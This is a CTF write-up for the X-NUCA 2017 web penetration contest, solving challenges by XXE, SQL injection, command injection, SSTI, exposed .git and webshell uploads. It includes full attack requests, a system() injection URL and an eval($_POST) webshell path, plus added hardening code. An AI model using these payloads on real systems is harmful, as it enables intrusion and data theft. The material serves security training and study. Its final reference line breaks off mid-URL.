Range Penetration Competition (X-NUCA 2017) writeup

No.1 Do you like kaomoji? | Solved
No.2 The md5 that leaves you speechless | Solved
No.3 Pav1 and lloowweerrxx.avi | Solved
No.4 X-NUCA 2017's Secrets | Solved
No.5 Lucky Number Calc | Solved
No.6 Hello World | Solved
No.8 Watching videos is such fun | Solved
No.9 The Best Community | Solved
No.11 Two little bees | Solved
No.14 DuomiCMS | Solved
No.16 Have a go at flask | Solved
No.18 AContent | Solved
No.21 Freecms | Solved
No.23 Find the entrance | Solved
No.24 Cute stars | Solved
No.25 | Solved
No.1 Do you like kaomoji? | Solved
A problem whose point was never clear.
No.2 The md5 that leaves you speechless | Solved
Keywords: a CTF challenge
Challenge text: "Pav1 likes to Baidu any md5 he cannot crack. A speechless md5." Target: e5a5dc7404c4e4dad32e4556ac2588b6.xnuca.cn. The HTML comment hints that this is a MySQL character-set issue.
Guessing that every account is admin, query for admin.
Following https://www.leavesongs.com/PENETRATION/mysql-charset-trick.html (MySQL charset collation trick),
query for admin%c2 instead.
The returned hash, 16714f297ee17b13a097a15cd229c947, is a slightly different MD5; looking it up at https://somd5.com/ yields the flag.
xnuca{0c7b5781935082833f6487a69d81404b}
No.3 Pav1 and lloowweerrxx.avi | Solved
CVE-2016-1897
No.4 X-NUCA 2017's Secrets | Solved
Download the source from /res/site.war, unzip it and read the classes with jd-gui. Adding isActive=1 to the registration request lets you log in.
The next goal is to get isSupaAdministrata=1.
Following http://blog.csdn.net/qq_27446553/article/details/73480823 (automatic object binding of request parameters), we obtain
http://a4b359466421ae3aa76a8b116dda3870.xnuca.cn/res/HYGorlL29LtcMCR6GUg23XRMJxVge5F7.js
(function() { alert('xnuca{hbeLMqNuCnohaWTQhxpf5Ep7yMBjcjG3}')
})
No.5 Lucky Number Calc | Solved
XML injection (XXE through an external entity):
POST /ctf1.php HTTP/1.1
Host: f83f119af64fa2b94c37231bbce09678.xnuca.cn
Content-Length: 174
Accept: */*
Origin: http://f83f119af64fa2b94c37231bbce09678.xnuca.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://f83f119af64fa2b94c37231bbce09678.xnuca.cn/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Connection: close

<!DOCTYPE results [
<!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<user>
<name>&harmless;</name>
</user>
The response carries /etc/passwd, base64-encoded.
ctf1.php (obtained through the same entity trick):
<?php
$xmldata = file_get_contents("php://input");
#$data = simplexml_load_string($xmldata);
// Entity loader enabled plus LIBXML_NOENT: external entities are resolved,
// which is the XXE sink.
libxml_disable_entity_loader(false);
$dom = new DOMDocument();
$dom->loadXML($xmldata, LIBXML_NOENT | LIBXML_DTDLOAD);
$data = simplexml_import_dom($dom);
$str = $data->name;
// Blacklist on the parsed value; base64 output passes it, so php://filter works.
if (preg_match("/[\'.,:;*?~`!@#$%^&)(<>{}]|\]|\[|\/|\\\|\"|\|/", $str)) {
    echo 'Illegal Input';
} else {
    $firstnum = ord(substr($str, 0, 1));
    $stlen = strlen($str);
    $luckynum = ($firstnum * $stlen) % 100;
    $res = 'Dear ' . $str . ', Your Lucky Number is ' . $luckynum;
    echo $res;
}
?>
Reading /etc/hosts the same way gives the flag:
xnuca{N3sSMD165KesSXlyOgwMGTepI2HTJC0b}
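As an added defender-side example (not the challenge's code), here is the name-parsing step of ctf1.php ported to Python with the DTD refused before the parser ever sees it, followed by the same blacklist and lucky-number formula; the XXE payload above is embedded as a constructed sample.

```python
import xml.etree.ElementTree as ET

# Hardened stand-in for ctf1.php (added example). The PHP version enables the
# entity loader and LIBXML_NOENT, so a DOCTYPE can pull local files through
# &harmless;. Here any DTD or entity declaration is refused before parsing.
ILLEGAL = set("'.,:;*?~`!@#$%^&)(<>{}][/\\\"|")   # same blacklist as the PHP

def lucky_number(body: bytes):
    """Return (name, lucky_number); raise ValueError for rejected input."""
    if b"<!DOCTYPE" in body.upper() or b"<!ENTITY" in body.upper():
        raise ValueError("DTD/entity declarations are not accepted")
    root = ET.fromstring(body)
    if root.tag != "user" or root.find("name") is None:
        raise ValueError("expected <user><name>...</name></user>")
    name = root.findtext("name") or ""
    if any(c in ILLEGAL for c in name):
        raise ValueError("Illegal Input")
    first = ord(name[0]) if name else 0          # PHP ord('') is 0
    return name, (first * len(name)) % 100

def is_rejected(body: bytes) -> bool:
    """True when the request would be refused (bad XML, DTD, or blacklist)."""
    try:
        lucky_number(body)
        return False
    except (ValueError, ET.ParseError):
        return True

# Constructed samples: the XXE payload from the writeup and a benign request.
XXE_PAYLOAD = b"""<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<user><name>&harmless;</name></user>"""
BENIGN = b"<user><name>Alice</name></user>"
```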
No.6 Hello World | solved
http://91101217df5a534c58f8b0e0922e1161.xnuca.cn/.git/config is exposed.
Dumping the repository with a tool yields one js file and one php file.
The ciphertext in the js decodes to "flag is in flag.js".
The php is Discuz's core encrypt/decrypt function (authcode), obfuscated:
flag.php
<?php
ini_set("display_errors", "Off");
error_reporting(0);
// Obfuscated Discuz authcode(): $c is the key, $e the length of the random
// prefix, $d the expiry. $k is never set, so only the ENCODE branch runs.
function encode($b, $c = '', $d = 0) {
    $e = 4;
    $c = md5($c); // "816302c22ad445a2cb9b7d0a209f2854"
    $f = md5(substr($c, 0, 16)); // "832d748a3cad1935ab1d9d18182e9ec9"
    $g = md5(substr($c, 16, 16)); // "ac4f2b390bc5f79a1f987ac15cb7f36d"
    $h = $e ? ($k == 'DECODE' ? substr($b, 0, $e) : substr(md5(microtime()), -$e)) : ''; // 3133
    $l = $f . md5($f . $h); // "832d748a3cad1935ab1d9d18182e9ec99a6a04e6f4386d374d5e38fcb24f1c9f"
    $m = strlen($l); // 64
    // expiry (10 digits) + md5 check over body and $g (16 chars) + body
    $b = sprintf('%010d', $d ? $d + time() : 0) . substr(md5($b . $g), 0, 16) . $b;
    $n = strlen($b);
    $o = '';
    $p = range(0, 255);
    $q = array();
    for ($r = 0; $r <= 255; $r++) {
        $q[$r] = ord($l[$r % $m]);
    }
    // RC4 key scheduling
    for ($s = $r = 0; $r < 256; $r++) {
        $s = ($s + $p[$r] + $q[$r]) % 256;
        $t = $p[$r];
        $p[$r] = $p[$s];
        $p[$s] = $t;
    }
    // RC4 keystream XOR
    for ($u = $s = $r = 0; $r < $n; $r++) {
        $u = ($u + 1) % 256;
        $s = ($s + $p[$u]) % 256;
        $t = $p[$u];
        $p[$u] = $p[$s];
        $p[$s] = $t;
        $o .= chr(ord($b[$r]) ^ ($p[($p[$u] + $p[$s]) % 256]));
    }
    return $h . str_replace('=', '', base64_encode($o));
}
$c = "flag_1s_n0t_h3re";
$cipher = "3133g8JTV89Ds4oh5k0JRPFijAbc1Qw7HciaZfhsV5lWr+7RM9IAF9SNw9WJMEg";
?>
Decoding $cipher with that key again gives "flag is in flag.js", which is no help at all.
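A Python port of the flag.php authcode routine, added here (it is neither the writeup's nor Discuz's code), with the DECODE branch restored from the Discuz source; the helper names keya/keyb/keyc are assumptions that map to the page's $f/$g/$h.

```python
import base64
import hashlib
import time

# Added example: Python port of the Discuz-style authcode() in flag.php, with the
# DECODE branch restored from the Discuz source. keya/keyb/keyc = page's $f/$g/$h.
_md5 = lambda d: hashlib.md5(d).hexdigest()

def _rc4(key: bytes, data: bytes) -> bytes:
    # Plain RC4 (KSA + PRGA); the PHP loops repeat the 64-byte key over 256 slots.
    box = list(range(256))
    rnd = [key[i % len(key)] for i in range(256)]
    j = 0
    for i in range(256):
        j = (j + box[i] + rnd[i]) % 256
        box[i], box[j] = box[j], box[i]
    out, a, j = bytearray(), 0, 0
    for c in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(c ^ box[(box[a] + box[j]) % 256])
    return bytes(out)

def _keys(key: str, keyc: str):
    k = _md5(key.encode())
    keya, keyb = _md5(k[:16].encode()), _md5(k[16:].encode())       # $f, $g
    return keyb, (keya + _md5((keya + keyc).encode())).encode()     # $l

def authcode_encode(plain: str, key: str, keyc=None, expiry: int = 0) -> str:
    if keyc is None:                      # PHP: substr(md5(microtime()), -4)
        keyc = _md5(str(time.time()).encode())[-4:]
    keyb, crypt = _keys(key, keyc)
    body = plain.encode()
    stamp = b"%010d" % (expiry + int(time.time()) if expiry else 0)
    check = _md5(body + keyb.encode())[:16].encode()   # md5 tag over body+keyb
    return keyc + base64.b64encode(_rc4(crypt, stamp + check + body)).decode().rstrip("=")

def authcode_decode(cipher: str, key: str):
    keyc, rest = cipher[:4], cipher[4:]
    keyb, crypt = _keys(key, keyc)
    raw = _rc4(crypt, base64.b64decode(rest + "=" * (-len(rest) % 4)))
    stamp, check, body = raw[:10], raw[10:26], raw[26:]
    # Reject expired tokens and bodies whose md5 tag does not verify (wrong key/tampering).
    if not stamp.isdigit() or (int(stamp) and int(stamp) <= int(time.time())):
        return None
    if check != _md5(body + keyb.encode())[:16].encode():
        return None
    return body.decode(errors="replace")
```

Calling authcode_decode with the page's $cipher and the key flag_1s_n0t_h3re should return "flag is in flag.js", as the writeup reports; the md5 tag is what makes a wrong key or a tampered body come back as None.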
https://gist.github.com/angusty/bcbb64fb6dc47b26674a
Dump .git/objects by hand:
git cat-file -p f2b45f1e5af6dc1a8607c11e4ddc5fd077276c45 > 1.js
git cat-file -p 04bb09bb63fe48e6cab3e1c72a7ef51dda9634b8 > 2.js
Then diff the two files to recover the flag:
flag{82efc37f1cd5d4636ea7cadcd5a814a2}
No.8 Watching videos is such fun | Solved
bd314808c1ed529fdba936fdffc5c7ba.xnuca.cn
Reference: http://www.bugku.com/thread-28-1-1.html
No.9 The Best Community | Solved
http://a8cb8b3cde7837fb14512b1055e4a275.xnuca.cn
https://www.exploit-db.com/exploits/40756/
No.11 Two little bees | Solved
http://00aa852a37a43db58ac318f0deaef536.xnuca.cn
Challenge text: "Create a file named 20778565df0d421b539bf4e66fe21738 under the target's /writeHere/ directory."
Reference: https://bbs.ichunqiu.com/thread-12635-1-1.html
http://00aa852a37a43db58ac318f0deaef536.xnuca.cn/admin/login.php looked injectable, but the credentials turned out to be
account: admin, password: amdin
The uploaded file ends up at /upload/img/201708261723177106.php?a=eval($_POST[q]);
No.14 DuomiCMS | Solved
http://d832106f99c258d75bb16d1873e6c77b.xnuca.cn/
http://3b65cbfdc649746ca312ea65e6e1df95.xnuca.cn/search.php?jq=1);system(dir);//&searchtype=5
Command execution through the search parameter.
Reference: http://www.lofter.com/tag/duomicms
No.16 Have a go at flask | Solved
2bf75b750bb0799fd95dad8ac92f1cb8.xnuca.cn: the 404 page reflects the path into a server-side template (SSTI),
so code can be executed directly from there.
No.18 AContent | Solved
Reference: https://www.htbridge.com/advisory/HTB23117
xnuca{Co8n0g5r72a4tul3at2ions!Y0ug0tMe}
No.21 Freecms | Solved
S2-045 (Struts2 OGNL injection); one run of the tool does it.
No.23 Find the entrance | Solved
5e7d47186dc0e2520479e9bec3bdcd75.xnuca.cn
http://07945fd84fe47a1a2264eb539fed1c1b.xnuca.cn/?/admin
Weak password: admin / admin.
Arbitrary file upload lets you drop a small webshell.
The flag is in /etc/flag.txt.
No.24 Cute stars | Solved
5e7d47186dc0e2520479e9bec3bdcd75.xnuca.cn
POST /index.php?_a=do_mail&_m=mod_email HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: PHPSESSID=65676uue8hmaigepggn66pn1l6
Host: 522e52f9f4f81b75b2718ad29ac60c14.xnuca.cn
Connection: close
User-Agent: Paw/3.1.2 (Macintosh; OS X/10.12.6) GCDHTTPRequest
Content-Length: 112

title=aa&email_s=a&email_m=a&type=a&users=aaaa%27%7Caaa&role%5B%5D=abdc%7D%27+union+select+1%2Cuser%28%29%2C3%23
The injection in the role[] parameter yields the admin password 1234!@#$. After logging in, upload an image and rename it to .php in the file manager.
No.25 | Solved
metinfo 5.3.1 at d231646c5c0e4ac216204b5d166e0c56.xnuca.cn
metinfo reference: https
This article is from the ROIS team!